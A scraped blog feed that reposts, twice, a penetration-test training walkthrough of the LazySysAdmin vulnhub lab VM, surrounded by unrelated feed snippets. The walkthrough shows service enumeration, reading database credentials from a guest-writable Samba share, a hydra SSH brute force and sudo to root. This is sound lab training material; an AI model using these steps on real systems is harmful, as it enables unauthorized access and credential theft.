Please contact your members of Congress and urge them to hold CBP accountable. Congress depends on hearing from their constituents to know where to focus, and public pressure can ensure that social media surveillance won’t get overlooked.
from Deeplinks https://ift.tt/2ZzthFq
0 notes
Text
Penetration Test Training – LazySysAdmin: 1 (vanilla style)
and Kai Herings
Good morning everyone…
Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1.
To use this image, just download, unzip and throw it against a running virtualbox.
Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:
netdiscover
nmap
dirb
THC hydra
If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1 _________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------- 192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor
Ah, right, 192.168.60.2, thats fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2" $ echo $ip
Nice, let’s start a common scanning for services:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET Nmap scan report for 192.168.60.2 Host is up (1.0s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.60.1 |_ error: Closing link: ([email protected]) [Client exited] Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2017-11-05T00:22:19+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2017-11-04 15:22:19 |_ start_date: 1601-01-01 00:53:28
Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that ist nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt $ echo "guest" >> login.txt $ echo "LAZYSYSADMIN" >> login.txt $ echo "lazysysadmin" >> login.txt $ echo "x00" >> login.txt
Let’s chat…
Having a look a the irc deamon …
$ telnet 192.168.60.2 6667 Escape character is '^]' :Admin.local NOTICE Auth :*** Looking up your hostname... >>PASS none :Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead. >>NICK Bla >>USER blah blah blah blah :Admin.local NOTICE Auth :Welcome to Localnet! :Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected] :Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0 :Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016 :Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov :Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server :Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server :Admin.local 042 Bla 690AAAAAD :your unique I :Admin.local 375 Bla :Admin.local message of the day :Admin.local 372 Bla :- Please edit /etc/inspircd/mot :Admin.local 376 Bla :End of message of the day. :Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers :Admin.local 254 Bla 0 :channels formed :Admin.local 255 Bla :I have 1 clients and 0 servers :Admin.local 265 Bla :Current Local Users: 1 Max: 1 :Admin.local 266 Bla :Current Global Users: 1 Max: 1
Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET Nmap scan report for 192.168.60.2 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: LAZYSYSADMIN Host script results: | smb-enum-shares: | account_used: guest | \\192.168.60.2\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Web server) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.60.2\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\192.168.60.2\share$: | Type: STYPE_DISKTREE | Comment: Sumshare | Users: 0 | Max Users: | Path: C:\var\www\html\ | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE
Oh, nice! A guest writeable directory. Maybe we can snoop around…
$ mkdir share $ mount_smbfs //guest:@192.168.60.2/share$ share $ cd share $ tree -L 2 .
. ├── Backnode_files │ ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg │ ├── failure-good-thing-fixed.png │ ├── front-end.css │ ├── front-end.js │ ├── jquery-ui.js │ ├── jquery.js │ ├── logo.png │ ├── normalize.css │ ├── pageable.js │ ├── picto1.png │ ├── picto2.png │ ├── picto3.png │ ├── script.json │ ├── styles.css │ └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif ├── apache ├── deets.txt ├── index.html ├── info.php ├── old ├── robots.txt ├── test ├── todolist.txt ├── wordpress │ ├── index.php │ ├── license.txt │ ├── readme.html │ ├── wp-activate.php │ ├── wp-admin │ ├── wp-blog-header.php │ ├── wp-comments-post.php │ ├── wp-config-sample.php │ ├── wp-config.php │ ├── wp-content │ ├── wp-cron.php │ ├── wp-includes │ ├── wp-links-opml.php │ ├── wp-load.php │ ├── wp-login.php │ ├── wp-mail.php │ ├── wp-settings.php │ ├── wp-signup.php │ ├── wp-trackback.php │ └── xmlrpc.php └── wp
Really? A wordpress installation! Let us check this first.
$ cat wordpress/wp-config.php | grep DB_USER define('DB_USER', 'Admin'); $ cat wordpress/wp-config.php | grep DB_PASSWORD define('DB_PASSWORD', 'TogieMYSQL12345^^'); $ cat wordpress/wp-config.php | grep DB_NAME define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt $ echo "Admin" >> login.txt $ echo "admin" >> login.txt $ echo "TogieMYSQL12345^^" >> login.txt $ echo "Togie" >> login.txt $ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345
$ echo "CBF" >> login.txt $ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we got some stuff here, but where to put it?
Land of the Apache
Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:
$ dirb http://$ip
----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Nov 4 14:38:59 2017 URL_BASE: http://192.168.60.2/ WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.60.2/ ---- ==> DIRECTORY: http://ift.tt/2hvafiO + http://ift.tt/2jlanBV (CODE:200|SIZE:36072) + http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236) ==> DIRECTORY: http://ift.tt/2jlao8X ==> DIRECTORY: http://ift.tt/2hyB3OZ ==> DIRECTORY: http://ift.tt/2jnXDu5 + http://ift.tt/2htorZo (CODE:200|SIZE:92) + http://ift.tt/2jkJEoX (CODE:403|SIZE:292) ==> DIRECTORY: http://ift.tt/2hwIiXI ==> DIRECTORY: http://ift.tt/2jlv7cQ ==> DIRECTORY: http://192.168.60.2/wp/ ... (lots of output)
Ok, by the time dirb is running we got some interesting directories to look at:
http://ift.tt/2hvafiO
http://ift.tt/2hw2XeJ
http://ift.tt/2jnXDu5
http://ift.tt/2jlv7cQ
And some more. We’ve already seen those in the samba-enumeration. Lets try our wordpress then…
$ curl -v http://ift.tt/2jlv7cQ
... My name is togie. My name is togie. My name is togie. My name is togie. ...
mhhh that togie again…mhhh, maybe…we can try ssh…
Serpentine water monster
let us try our already filled login list
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23 [DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task [DATA] attacking ssh://192.168.60.2:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active [22][ssh] host: 192.168.60.2 login: togie password: 12345 1 of 1 target successfully completed, 1 valid password found Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42
Nice! So we login using togie and password 12345
$ ssh togie@$ip
################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## [email protected]'s password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: http://ift.tt/ABdZxn System information as of Sun Nov 5 02:24:33 AEST 2017 System load: 0.0 Processes: 177 Usage of /: 48.5% of 2.89GB Users logged in: 0 Memory usage: 31% IP address for eth0: 192.168.60.2 Swap usage: 0% Graph this data and manage this system at: http://ift.tt/XlAX5B 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We got sudo…
Flag
$ sudo su - [sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28 drwx------ 3 root root 4096 Aug 15 23:10 ./ drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../ -rw------- 1 root root 1050 Nov 3 14:45 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Aug 14 20:30 .cache/ -rw-r--r-- 1 root root 140 Feb 20 2014 .profile -rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.
Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2fA8nUr
0 notes
Text
Penetration Test Training – LazySysAdmin: 1 (vanilla style)
and Kai Herings
Good morning everyone…
Today we’re going to start out training session with a fairly decent image from vulnhub.com – LazySysAdmin: 1.
To use this image, just download, unzip and throw it against a running virtualbox.
Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP Adress via DHCP on this network. We’re using vboxnet4 (192.168.60.0/24) here, so just adapt this to your networking.
We are also working on a macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:
netdiscover
nmap
dirb
THC hydra
If you want to install these tools with Homebrew, just tap brew tap feffi/homebrew-pentest.
$ brew tap feffi/homebrew-pentest
Everything up? OK, let’s start.
Meanwhile somewhere in outer space…
$ sudo netdiscover -i vboxnet4 -f -r 192.168.60.0/24
Currently scanning: Finished! | Our Mac is: DE:AD:BE:EF:DE:AD - 0 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 1 _________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------- 192.168.60.2 08:00:27:6d:95:4e 1 60 Unknown vendor
Ah, right, 192.168.60.2, thats fine. For the sake of reusing this IP in our tasks, we just shorten it a bit:
$ export ip="192.168.60.2" $ echo $ip
Nice, let’s start a common scanning for services:
$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET Nmap scan report for 192.168.60.2 Host is up (1.0s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: 192.168.60.1 |_ error: Closing link: ([email protected]) [Client exited] Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2017-11-05T00:22:19+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2017-11-04 15:22:19 |_ start_date: 1601-01-01 00:53:28
Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see the account guest is authenticated as user, that ist nice. Before we continue, we note down everything that might be a username or password:
$ echo "TR2" >> login.txt $ echo "guest" >> login.txt $ echo "LAZYSYSADMIN" >> login.txt $ echo "lazysysadmin" >> login.txt $ echo "x00" >> login.txt
Let’s chat…
Having a look a the irc deamon …
$ telnet 192.168.60.2 6667 Escape character is '^]' :Admin.local NOTICE Auth :*** Looking up your hostname... >>PASS none :Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.1) instead. >>NICK Bla >>USER blah blah blah blah :Admin.local NOTICE Auth :Welcome to Localnet! :Admin.local 001 Bla :Welcome to the Localnet IRC Network [email protected] :Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0 :Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016 :Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov :Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server :Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server :Admin.local 042 Bla 690AAAAAD :your unique I :Admin.local 375 Bla :Admin.local message of the day :Admin.local 372 Bla :- Please edit /etc/inspircd/mot :Admin.local 376 Bla :End of message of the day. :Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers :Admin.local 254 Bla 0 :channels formed :Admin.local 255 Bla :I have 1 clients and 0 servers :Admin.local 265 Bla :Current Local Users: 1 Max: 1 :Admin.local 266 Bla :Current Global Users: 1 Max: 1
Checking for weaknesses on InspIRCd-2.0 … only DoS and spoofing, no remote access known. Let’s walk on to the next.
Samba, Samba, olê…
Now we can enumerate the Samba shares as guest:
$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET Nmap scan report for 192.168.60.2 Host is up (0.00054s latency). PORT STATE SERVICE VERSION 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: LAZYSYSADMIN Host script results: | smb-enum-shares: | account_used: guest | \\192.168.60.2\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Web server) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.60.2\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: | Current user access: | \\192.168.60.2\share$: | Type: STYPE_DISKTREE | Comment: Sumshare | Users: 0 | Max Users: | Path: C:\var\www\html\ | Anonymous access: READ/WRITE |_ Current user access: READ/WRITE
Oh, nice! A guest writeable directory. Maybe we can snoop around…
$ mkdir share $ mount_smbfs //guest:@192.168.60.2/share$ share $ cd share $ tree -L 2 .
. ├── Backnode_files │ ├── AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4.jpg │ ├── failure-good-thing-fixed.png │ ├── front-end.css │ ├── front-end.js │ ├── jquery-ui.js │ ├── jquery.js │ ├── logo.png │ ├── normalize.css │ ├── pageable.js │ ├── picto1.png │ ├── picto2.png │ ├── picto3.png │ ├── script.json │ ├── styles.css │ └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif ├── apache ├── deets.txt ├── index.html ├── info.php ├── old ├── robots.txt ├── test ├── todolist.txt ├── wordpress │ ├── index.php │ ├── license.txt │ ├── readme.html │ ├── wp-activate.php │ ├── wp-admin │ ├── wp-blog-header.php │ ├── wp-comments-post.php │ ├── wp-config-sample.php │ ├── wp-config.php │ ├── wp-content │ ├── wp-cron.php │ ├── wp-includes │ ├── wp-links-opml.php │ ├── wp-load.php │ ├── wp-login.php │ ├── wp-mail.php │ ├── wp-settings.php │ ├── wp-signup.php │ ├── wp-trackback.php │ └── xmlrpc.php └── wp
Really? A wordpress installation! Let us check this first.
$ cat wordpress/wp-config.php | grep DB_USER define('DB_USER', 'Admin'); $ cat wordpress/wp-config.php | grep DB_PASSWORD define('DB_PASSWORD', 'TogieMYSQL12345^^'); $ cat wordpress/wp-config.php | grep DB_NAME define('DB_NAME', 'wordpress');
Noted! We got our first username/password combination.
$ echo "deets" >> login.txt $ echo "Admin" >> login.txt $ echo "admin" >> login.txt $ echo "TogieMYSQL12345^^" >> login.txt $ echo "Togie" >> login.txt $ echo "togie" >> login.txt
What else do we get here?
$ cat deets.txt
CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345
$ echo "CBF" >> login.txt $ echo "12345" >> login.txt
Yeah…sure…we updated it.
$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser
Done. So we got some stuff here, but where to put it?
Land of the Apache
Maybe we should enumerate a little further. We got an website listening on port 80. Spider that:
$ dirb http://$ip
----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat Nov 4 14:38:59 2017 URL_BASE: http://192.168.60.2/ WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.60.2/ ---- ==> DIRECTORY: http://ift.tt/2hvafiO + http://ift.tt/2jlanBV (CODE:200|SIZE:36072) + http://ift.tt/2hw2XeJ (CODE:200|SIZE:77236) ==> DIRECTORY: http://ift.tt/2jlao8X ==> DIRECTORY: http://ift.tt/2hyB3OZ ==> DIRECTORY: http://ift.tt/2jnXDu5 + http://ift.tt/2htorZo (CODE:200|SIZE:92) + http://ift.tt/2jkJEoX (CODE:403|SIZE:292) ==> DIRECTORY: http://ift.tt/2hwIiXI ==> DIRECTORY: http://ift.tt/2jlv7cQ ==> DIRECTORY: http://192.168.60.2/wp/ ... (lots of output)
Ok, by the time dirb is running we got some interesting directories to look at:
http://ift.tt/2hvafiO
http://ift.tt/2hw2XeJ
http://ift.tt/2jnXDu5
http://ift.tt/2jlv7cQ
And some more. We’ve already seen those in the samba-enumeration. Lets try our wordpress then…
$ curl -v http://ift.tt/2jlv7cQ
... My name is togie. My name is togie. My name is togie. My name is togie. ...
mhhh that togie again…mhhh, maybe…we can try ssh…
Serpentine water monster
let us try our already filled login list
$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://ift.tt/1cTCuIN) starting at 2017-11-04 20:35:23 [DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task [DATA] attacking ssh://192.168.60.2:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active [22][ssh] host: 192.168.60.2 login: togie password: 12345 1 of 1 target successfully completed, 1 valid password found Hydra (http://ift.tt/1cTCuIN) finished at 2017-11-04 20:36:42
Nice! So we login using togie and password 12345
$ ssh togie@$ip
################################################################################################## # Welcome to Web_TR1 # # All connections are monitored and recorded # # Disconnect IMMEDIATELY if you are not an authorized user! # ################################################################################################## [email protected]'s password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686) * Documentation: http://ift.tt/ABdZxn System information as of Sun Nov 5 02:24:33 AEST 2017 System load: 0.0 Processes: 177 Usage of /: 48.5% of 2.89GB Users logged in: 0 Memory usage: 31% IP address for eth0: 192.168.60.2 Swap usage: 0% Graph this data and manage this system at: http://ift.tt/XlAX5B 133 packages can be updated. 0 updates are security updates. togie@LazySysAdmin:~$
So we got a shell. Let’s enumerate further.
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
We got sudo…
Flag
$ sudo su - [sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28 drwx------ 3 root root 4096 Aug 15 23:10 ./ drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../ -rw------- 1 root root 1050 Nov 3 14:45 .bash_history -rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc drwx------ 2 root root 4096 Aug 14 20:30 .cache/ -rw-r--r-- 1 root root 140 Feb 20 2014 .profile -rw-r--r-- 1 root root 347 Aug 21 19:35 proof.txt
Gotcha!
$ cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 Well done :) Hope you learn't a few things along the way. Regards, Togie Mcdogie Enjoy some random strings WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851 2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7 pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02 bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
The post Penetration Test Training – LazySysAdmin: 1 (vanilla style) appeared first on codecentric AG Blog.
Penetration Test Training – LazySysAdmin: 1 (vanilla style) published first on http://ift.tt/2vCN0WJ
0 notes
Note
sapphic zhongtao fan... ur so based i thought i was the only one who saw the vision
Anon ilysm.. /p WE’RE IN THIS TOGETHERRRRRRRR 🤝🤝🤝🤝🤝🤝🤝🤝🤝🤝🤝
2 notes
·
View notes
Last Seen Blogs
sporadicbeauty
Grace
pemuas-world
Untitled
cotton-home
Cotton Home
big-girl-joa
빅걸조아!
father-cprime
nude addict